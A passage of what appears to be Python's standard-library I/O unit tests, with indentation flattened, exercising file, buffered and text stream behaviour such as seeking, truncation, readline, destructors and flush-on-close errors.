self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b'x')
def test_invalid_operations(self):
exc = self.UnsupportedOperation
for mode in ('w', 'wb'):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, 'wb', buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, 'rb', buffering=0) as fp:
self.assertRaises(exc, fp.write, b'blah')
self.assertRaises(exc, fp.writelines, [b'blah\n'])
with self.open(support.TESTFN, 'rb') as fp:
self.assertRaises(exc, fp.write, b'blah')
self.assertRaises(exc, fp.writelines, [b'blah\n'])
with self.open(support.TESTFN, 'r') as fp:
self.assertRaises(exc, fp.write, 'blah')
self.assertRaises(exc, fp.writelines, ['blah\n'])
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
def pipe_reader():
[r, w] = os.pipe()
os.close(w)
return self.FileIO(r, 'r')
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, 'w')
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(), self.
MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), 'ascii')
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), 'ascii')
tests = (pipe_reader, 'fr'), (pipe_writer, 'fw'), (buffered_reader, 'r'
), (buffered_writer, 'w'), (buffered_random, 'rws'), (
buffered_rw_pair, 'rw'), (text_reader, 'r'), (text_writer, 'w'), (
self.BytesIO, 'rws'), (self.StringIO, 'rws')
for [test, abilities] in tests:
if test is pipe_writer and not threading:
continue
with self.subTest(test), test() as obj:
readable = 'r' in abilities
self.assertEqual(obj.readable(), readable)
writable = 'w' in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = '3'
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b'3'
else:
self.fail('Unknown base class')
if 'f' in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith('win') and test in (pipe_reader,
pipe_writer):
continue
seekable = 's' in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\x00bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, 'wb', buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, 'rb', buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, 'wb') as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'abc\ndef\nxyzzy\nfoo\x00bar\nanother line')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.readline(), b'abc\n')
self.assertEqual(f.readline(10), b'def\n')
self.assertEqual(f.readline(2), b'xy')
self.assertEqual(f.readline(4), b'zzy\n')
self.assertEqual(f.readline(), b'foo\x00bar\n')
self.assertEqual(f.readline(None), b'another line')
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, 'r') as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b'hello world\n')
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires('largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, 'w+b', 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, 'w+b') as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, 'wb', bufsize) as f:
f.write(b'xxx')
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, 'wb', bufsize) as f:
1 / 0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
def test_append_mode_tell(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'xxx')
with self.open(support.TESTFN, 'ab', buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, 'ab') as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, 'a') as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, 'wb')
f.write(b'xxx')
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'xxx')
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'xxx')
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'xxx')
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, 'w'))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, 'w') as f:
f.write('egg\n')
with self.open(support.TESTFN, 'r') as f:
file = self.open(f.fileno(), 'r', closefd=False)
self.assertEqual(file.read(), 'egg\n')
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'r',
closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, 'wb') as f:
f.write(b'egg\n')
with self.open(support.TESTFN, 'r') as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), 'r', closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, 'wb')
f.write(b'abcxxx')
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(f.read(), b'abcxxx')
def test_unbounded_file(self):
zero = '/dev/zero'
if not os.path.exists(zero):
self.skipTest('{0} does not exist'.format(zero))
if sys.maxsize > 2147483647:
self.skipTest('test can only run in a 32-bit address space')
if support.real_max_memuse < support._2G:
self.skipTest('test requires at least 2GB of memory')
with self.open(zero, 'rb', buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, 'rb') as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, 'r') as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close)
self.assertTrue(f.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
f.flush = lambda : None
def test_flush_error_on_close(self):
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY | os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, 'wb', buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
rawio = self.MockRawIOWithoutRead((b'abc', b'd', None, b'efg', None))
self.assertEqual(rawio.read(2), b'ab')
self.assertEqual(rawio.read(2), b'c')
self.assertEqual(rawio.read(2), b'd')
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b'ef')
self.assertEqual(rawio.read(2), b'g')
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b'')
def test_types_have_dict(self):
test = self.IOBase(), self.RawIOBase(), self.TextIOBase(
), self.StringIO(), self.BytesIO()
for obj in test:
self.assertTrue(hasattr(obj, '__dict__'))
def test_opener(self):
with self.open(support.TESTFN, 'w') as f:
f.write('egg\n')
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open('non-existent', 'r', opener=opener) as f:
self.assertEqual(f.read(), 'egg\n')
def test_bad_opener_negative_1(self):
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
with self.open(__file__, 'rb') as f1, self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
class Stream(self.BufferedIOBase):
def read(self, size):
return b'12345'
read1 = read
stream = Stream()
for method in ('readinto', 'readinto1'):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b'12345')
def test_fspath_support(self):
class PathLike:
def __init__(self, path):
self.path = path
def __fspath__(self):
return self.path
def check_path_succeeds(path):
with self.open(path, 'w') as f:
f.write('egg\n')
with self.open(path, 'r') as f:
self.assertEqual(f.read(), 'egg\n')
check_path_succeeds(PathLike(support.TESTFN))
check_path_succeeds(PathLike(support.TESTFN.encode('utf-8')))
bad_path = PathLike(TypeError)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(PathLike(support.TESTFN), 'rwxa')
class CIOTest(IOTest):
def test_IOBase_finalize(self):
class MyIO(self.IOBase):
def close(self):
pass
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg=
'Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg=
'C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output('stderr') as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith('Exception OSError: '), s)
self.assertTrue(s.endswith(' ignored'), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = '%s.%s' % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), '<%s>' % clsname)
raw.name = 'dummy'
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b'dummy'
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b)
except RuntimeError:
pass
def test_flush_error_on_close(self):
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close)
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed)
self.assertFalse(closed[0])
self.assertFalse(closed[1])
raw.flush = lambda : None
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err:
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err:
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b'A' * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = 'rb'
def test_constructor(self):
rawio = self.MockRawIO([b'abc'])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b'abc', bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b'abc'])
bufio.__init__(rawio)
self.assertEqual(b'abc', bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read(arg))
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'a', bufio.read(1))
self.assertEqual(b'b', bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b'c', bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b'd', bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b'efg', bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b'', bufio.read1(100))
self.assertEqual(rawio._reads, 4)
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'cd')
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ef')
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b'gf')
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b'gf')
rawio = self.MockRawIO((b'abc', None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b'cb')
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b'abc', b'de', b'fgh', b'jkl'))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b'ab')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b'c')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b'de')
self.assertEqual(rawio._reads, 2)
b = bytearray(2 * buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b'fghjkl')
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b'a' * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = array.array('i', b'x' * 32)
assert len(b) != 16
n = bufio.readinto(b)
self.assertGreater(n, len(b))
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * len(bm[n:]))
def test_readinto1_array(self):
buffer_size = 60
data = b'a' * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = array.array('i', b'x' * 32)
assert len(b) != 16
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * len(bm[n:]))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b'abc\n', b'd\n', b'ef'))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b'abc\n', b'd\n', b'ef'])
self.assertEqual(bufio().readlines(5), [b'abc\n', b'd\n'])
self.assertEqual(bufio().readlines(None), [b'abc\n', b'd\n', b'ef'])
def test_buffering(self):
data = b'abcdefghi'
dlen = len(data)
tests = [[100, [3, 1, 4, 8], [dlen, 0]], [100, [3, 3, 3], [dlen]],
[4, [1, 2, 4, 2], [4, 4, 1]]]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos + nbytes])
pos += nbytes
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
rawio = self.MockRawIO((b'abc', b'd', None, b'efg', None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b'abcd', bufio.read(6))
self.assertEqual(b'e', bufio.read(1))
self.assertEqual(b'fg', bufio.read())
self.assertEqual(b'', bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b'', bufio.read())
rawio = self.MockRawIO((b'a', None, None))
self.assertEqual(b'a', rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertEqual(b'abcdefg', bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, 'wb') as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02)
self.assertFalse(errors,
'the following exceptions were caught: %r' % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b'A' * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b'x' * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b'x' * n)
self.assertEqual(rawio._extraneous_reads, 0,
'failed for {}: {} != 0'.format(n, rawio._extraneous_reads))
rawio = self.MockRawIO([b'x' * (n - 1), b'x'])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b'x' * n)
self.assertEqual(rawio._extraneous_reads, 0,
'failed for {}: {} != 0'.format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
b = io.BufferedReader(io.BytesIO(b'12'))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
if sys.maxsize > 2147483647:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b'abc'])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b'abc', b'd', b'efg'))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, 'w+b')
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
with self.assertRaisesRegex(TypeError, 'BufferedReader'):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = 'wb'
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b'abc'))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b'ghi'))
bufio.flush()
self.assertEqual(b''.join(rawio._write_stack), b'abcghi')
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute', bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b'howdy!')
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b'howdy!'])
def test_write(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b'abc')
self.assertFalse(writer._write_stack)
buffer = bytearray(b'def')
bufio.write(buffer)
buffer[:] = b'***'
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b'abcdefghijklmnop'
for n in range(0, len(contents), 3):
bufio.write(contents[n:n + 3])
flushed = b''.join(writer._write_stack)
